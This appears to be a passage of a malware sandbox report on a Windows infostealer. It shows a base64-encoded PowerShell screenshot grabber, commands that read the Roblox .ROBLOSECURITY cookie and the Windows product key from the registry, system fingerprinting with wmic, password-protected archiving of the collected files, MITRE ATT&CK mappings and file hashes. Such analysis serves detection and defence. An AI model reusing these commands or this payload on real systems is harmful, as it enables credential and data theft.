JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1828
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\doqh4qse\doqh4qse.cmdline"
        5⤵
        
        PID:1188
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC8C.tmp" "c:\Users\Admin\AppData\Local\Temp\doqh4qse\CSC3904739BF95C4477805B53943BB450F3.TMP"
        6⤵
        
        PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1692
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1648
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1780
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2628
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1884
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:232
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32642\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\sdK30.zip" *"
    3⤵
    PID:3428
  - - C:\Users\Admin\AppData\Local\Temp\_MEI32642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI32642\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\sdK30.zip" *
      4⤵
      Executes dropped EXE
      PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6903d57eed54e89b68ebb957928d1b99

SHA1
fade011fbf2e4bc044d41e380cf70bd6a9f73212

SHA256
36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

SHA512
c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
380d1ccfae1b2950e7bcdfde36436840

SHA1
87acbf381b048ff861bace42e2f199a4c469d9d5

SHA256
34777797e55159e7d73c03527710adeaa5c0815645b0c487e0875b9c1a4576fc

SHA512
dcaa6eb5f6f8111e60c69f2022cf22cd1fe54e891384a8a6b3b677a0f3e2814e9c817d54b10a777101d0dac0a93cb9e3471e75b6eae308b9a41d224a20fccd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAC8C.tmp

Filesize
1KB

MD5
55e6e42c1b3fc602c554625ff4a5cef7

SHA1
62a1abbd93df1366fd1c0e173800d6b00355fb14

SHA256
0f1f74ac53dcf51762963c27552ff414268bc348dd47353b53c15b0ab8458291

SHA512
7a3f4d642e5d5ea7e0ac476c1d006ba5173e3d6b63a25e88a84c143c6ae6b256aed0f8ee41fce1573439c0c80e47e5f8a9c9ca9530437acdde05e8219157f92e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_bz2.pyd

Filesize
48KB

MD5
85c70974fac8e621ed6e3e9a993fbd6f

SHA1
f83974e64aa57d7d027b815e95ebd7c8e45530f1

SHA256
610983bbcb8ee27963c17ead15e69ad76ec78fac64deb7345ca90d004034cdd6

SHA512
142792750e4a5189dbeaa710e3f5b3689d593927ea77ded00eb5caada6b88d82a37459770845f1ea7c9f45da5a6ae70e19bfcf76d9f1a56184c3164b736bcb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_ctypes.pyd

Filesize
59KB

MD5
e7ef30080c1785baf2f9bb8cf5afe1b2

SHA1
b7d7d0e3b15de9b1e177b57fd476cecbdd4fcb79

SHA256
2891382070373d5070cb8fd6676afc9f5eb4236251f8fc5c0941af0c53a2d31e

SHA512
c2ec431d2821879bb505d8eca13fa3921db016e00b8674fa62b03f27dc5cee6dd0de16ba567d19d4b0af9a5cb34d544383a68cc63ff2fa9d8bb55e356d0d73e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_decimal.pyd

Filesize
105KB

MD5
3923e27b9378da500039e996222ffee6

SHA1
a9280559a71abf390348e1b6a0fb1f2409649189

SHA256
0275b03041f966e587d1c4c50266c3fdff1e1a65f652ad07b59cb85845b5457e

SHA512
051c613403fd80b9582dd48c1f38870cb26846d54b75603ea52a78202a72272107e95750de78cd8f6c56951ebde501b4892d90fb306326b86124c8cc97bca594

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_hashlib.pyd

Filesize
35KB

MD5
c8b153f0be8569ce2c2de3d55952d9c7

SHA1
0861d6dcd9b28abb8b69048caf3c073e94f87fdc

SHA256
af9f39d2a5d762214f6de2c8fec0a5bc6be0b8223ef47164caa4c6e3d6437a58

SHA512
81ccbfff0f4cdd1502af9d73928b940098b9acc58b19c1a939ecdf17418096294af4a4529ee7a0bbe1c686e3b0254651e211c1093264d1835065a82711ac0379

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_lzma.pyd

Filesize
85KB

MD5
bc2ebd2a95619ab14a16944b0ab8bde5

SHA1
c31ba45b911a2664fc622bb253374ab7512fc35a

SHA256
aeb3fd8b855b35204b5088c7a1591cc1ca78fffe707d70e41d99564b6cb617c6

SHA512
86a6685efec72860991c0f0fa50f46a208211d3f8fc44012b12437d141c5f1a24c34a366f164d225869680707b482ab27a2720c698ebe8026f1c5807e81f8437

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_queue.pyd

Filesize
26KB

MD5
fcbb24550f59068a37ea09a490923c8a

SHA1
1e51d9c156354e00909c9f016ddb392a832f8078

SHA256
de2ac6d99234a28dcf583d90dca7256de986fca9e896c9aafd1f18bb536978b8

SHA512
62474bf9d5f39591240f71fd9270fcc7a2b2c0b4a1f93cbb57021040ad85b3ab8c401d17aedf0141105118772f453c6137a026736f069cc7a965cb30e5479f07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_socket.pyd

Filesize
44KB

MD5
f6d0876b14bca5a264ec231895d80072

SHA1
d68b662cfc247c07851ef0764fe9652e3e2c0981

SHA256
bcbf9a952473e53f130ce77b0db69fe08c5845ce10dbe8c320b40f171a15d6a8

SHA512
1db02975634ffcc4e73fac355d7f67a915c3b4189feaf9e7b24ef831e9f4a2e60a4bd1ebfd8157282a4094814332d62957fcd204b20f2904527e203ab355ab8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_sqlite3.pyd

Filesize
57KB

MD5
0fdedcb9b3a45152239ca4b1aea4b211

SHA1
1ccff1f5e7b27c4156a231ad7a03bcc9695c5b92

SHA256
0fc03d25467850181c0fc4f0f8919c8c47cba2bf578698d4354aa84fd810c7f7

SHA512
8ce5b38ee64ac0cda831b6b2c746fb95baadda83665d8e125eaa8b4a07cb61b3ef88d60741b978b2108ec08b067f1c9c934099f539b1e24f55e3ca8350359611

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\_ssl.pyd

Filesize
65KB

MD5
53996068ae9cf68619da8cb142410d5e

SHA1
9eb7465d6f22ab03dac04cfce668811a87e198f2

SHA256
cbd320c42277086cd962fd0b25842904ceb436346d380319625f54363f031dcf

SHA512
d5fbc53a2fffecb1f3da4b126e306961de3b8070b5f722b6ed5e20bef6af48d52edf96c975f68278e337bc78a25b4227e9eb44b51baa786365a67cf977e4643e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\base_library.zip

Filesize
1.3MB

MD5
898e35281a756640780dbc31a0b78452

SHA1
845b59cfd9fb152725f250a872e9d1d7a66af258

SHA256
0daa440c78582a693dabbc2325a06d817131bb170bad436b126bad896f1377cd

SHA512
421cc4a15e94293e53f1039b8bb5be7edcbc8e3e0e4abc7f34faf991993f51cb5f51493b58bb341cb9579347ec134b02104454075a8e7e33e45b8e3a66a44d79

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\blank.aes

Filesize
109KB

MD5
2be1c1cd7a8c200b49cf8c995d975f4d

SHA1
51f2e5402954a8a68ebc8fc989817ff11f1d632a

SHA256
001bb2589c86e01d8cc4a8629bdfe835b4a6b81025f6f331bb2271c420d44a6f

SHA512
433c978432827a85c74595dca36f0b6e74d4a1b75cc6d025d4624daf0a8d011e721a8fe5ff7ee94b7a0220dda0e4a046877f53d2940c0b4e43eaf88c7e5189bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\libcrypto-3.dll

Filesize
1.6MB

MD5
27515b5bb912701abb4dfad186b1da1f

SHA1
3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411

SHA256
fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a

SHA512
087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\libssl-3.dll

Filesize
223KB

MD5
6eda5a055b164e5e798429dcd94f5b88

SHA1
2c5494379d1efe6b0a101801e09f10a7cb82dbe9

SHA256
377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8

SHA512
74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\python312.dll

Filesize
1.7MB

MD5
86d9b8b15b0340d6ec235e980c05c3be

SHA1
a03bdd45215a0381dcb3b22408dbc1f564661c73

SHA256
12dbbcd67015d6cdb680752184107b7deb84e906b0e8e860385f85d33858a5f6

SHA512
d360cc3f00d90fd04cbba09d879e2826968df0c1fdc44890c60b8450fe028c3e767450c3543c62d4f284fb7e004a9a33c52538c2279221ee6cbdb1a9485f88b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\select.pyd

Filesize
25KB

MD5
cce3e60ec05c80f5f5ee014bc933554c

SHA1
468d2757b201d6259034215cfd912e8e883f4b9e

SHA256
84a81cca6d80edd9ec2d31926231de393ed7f26ed86ae39219adc5eab24b8100

SHA512
7cbcee4dd4c817fbef8b9aef2d457b56970c5e5c03bdf2caf74415316b44e7da33ee39b6a434f4760c80f74c33b5c0c5ad00936d438b947a39ffcd53e890cf0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\sqlite3.dll

Filesize
622KB

MD5
c6ed91b8fdb99eba4c099eb6d0eea5d9

SHA1
915b2d004f3f07cd18610e413b087568258da866

SHA256
e6e1910e237ac7847748918804d1c414c0f1696a29e9718739312a233eb96d80

SHA512
92fe738fcd75e39c6bc9f1edb3b16a1a7cf3ae6c0d2c29c721b1a5bd3e07a4bb8e8295b3ad3cb44bcee05a8110855b0fea66b156461c4f1761c53c15d7e67ee5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32642\unicodedata.pyd

Filesize
295KB

MD5
427668e55e99222b3f031b46fb888f3a

SHA1
c9be630cb2536c20bbc6fc9ba4a57889cdb684bc

SHA256
9ca1b01048d3867cb002a01a148f279ba9edaf7b7ad04d17e3e911e445f2d831

SHA512
e5ca0ddc2758891090db726de2d3fd7f2ba64e309979136b4d3299445b1f751dfd8cd56bb3343499cb6ed479c08732d1d349d32b7f7e5ac417352bd0ce676253

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hrivi5ue.5kl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\doqh4qse\doqh4qse.dll

Filesize
4KB

MD5
319b722ed07677a40ffe97b4b827cd08

SHA1
4eab2718b0d58424b8dac1b96b40d4d3df7be7a7

SHA256
ba5dff4ceab7077384fb897b03d2a1fd7f56b66ddf17613b7328b781830e5783

SHA512
b5e41961ddef1c93d5bbd638e402b556460facb38fa60505a54b904a012e4d10017a08e8b3532ebb59d6c048b876d9846c561f4c65429a32dc3f8f35eada1628

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Desktop\BackupGet.mht

Filesize
229KB

MD5
30a26255de32c569e378cd5d32d97ae0

SHA1
c11b45e683fe5f9ef4bab2d59ff0cdcba0aded82

SHA256
7f6ca6414b4e51748466228b529f8d194b861c041c641fcedc00c7741708ca6d

SHA512
6d7cda4056ca2f301c358b40bdd25c92d396e615602d2bd45139868b5d2871fd6a47678da72e4704d86756692a8ed18d38ae4bb892e44a2440af2b7eac197959

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Desktop\ConvertReceive.mp4

Filesize
299KB

MD5
beeec372b15a83e0d440dbe4bf016098

SHA1
c20ebb126d6196ee51c1aafdf0cfac78a6a770cc

SHA256
8d80ff0e98841e446f6829bcecbb684b81f8c4de4d265c9b727a4adc153a2632

SHA512
6387f88981410595e6b4476a319da74b290d482816efe6fdff5856b6740b1724e234478828eb428bb9c60f1bc3ea1d73035238558d386f9dacb7d1b93e26ead9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Desktop\MoveSend.jpg

Filesize
243KB

MD5
e30a8b84f9b89d134e2ae5b68850683b

SHA1
fc63ca5e5a47608690ebad78936683c4da79f1b8

SHA256
418b8eaa2f94c8c78364943a523d180c807e964f50066b945986a94ee3d3b858

SHA512
4301341ab509cbdd3264c8880ac30001a27e5064396096e342735f169efafe4584aa4a6bb18e444fdde72819612018addd6c4418f45ad15153caf48d4ba4d346

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Desktop\OptimizeDebug.docx

Filesize
188KB

MD5
11120b2e96264efab0511a68121f26b0

SHA1
b17994211db25db815cf967856c035ca7a38ae77

SHA256
aa0c5a141b61fedd5f7569fee6f54d2e17300e7ed0abb59a7397c9cbe6a7f69a

SHA512
df42987d9091760aab6c1ec4245d5997edfb655248632285af67e12231af287861f6d84d08c987373dde4c64a9fdea8ecff91417af9ac40cb28c2d888e25e235

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Desktop\RequestUnprotect.docx

Filesize
13KB

MD5
022fef97b32af6b0f580f3c5c6d999a3

SHA1
6811d5569b73cb75bf769901f489cecc7194dacd

SHA256
81b8d8ac4d864b678b423ff8b39b1aac64c11322bc5081932efe3a50646dc648

SHA512
8441938668082a528026d163c24c3c60dd0dd80cf38b483307de3b52a7ade0e22cb61d8c88214c1ce503f3ceea1bbb71b3cb9fea9fe260079132a122de4f0dc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‍ ‌‏ \Common Files\Documents\AssertMove.xlsx

Filesize
10KB

MD5
be6aba023ca712a5732d5c961173dbb3

SHA1
31d6d15a5e5e2e627cf255d82733dcba4eca4190

SHA256
5d3e399b52d2a9eacb0545288b7d120a08761342a0543d9ad6380f01b2d78b13

SHA512
1a5c20138675ad5a57bbfcf5131253f56f1fb2fd2513c964150fb4a2b4258609594471ad053cb541854ffd6705f9a5ebc5bd62bbf437e3e72acfac6a895c1f1d

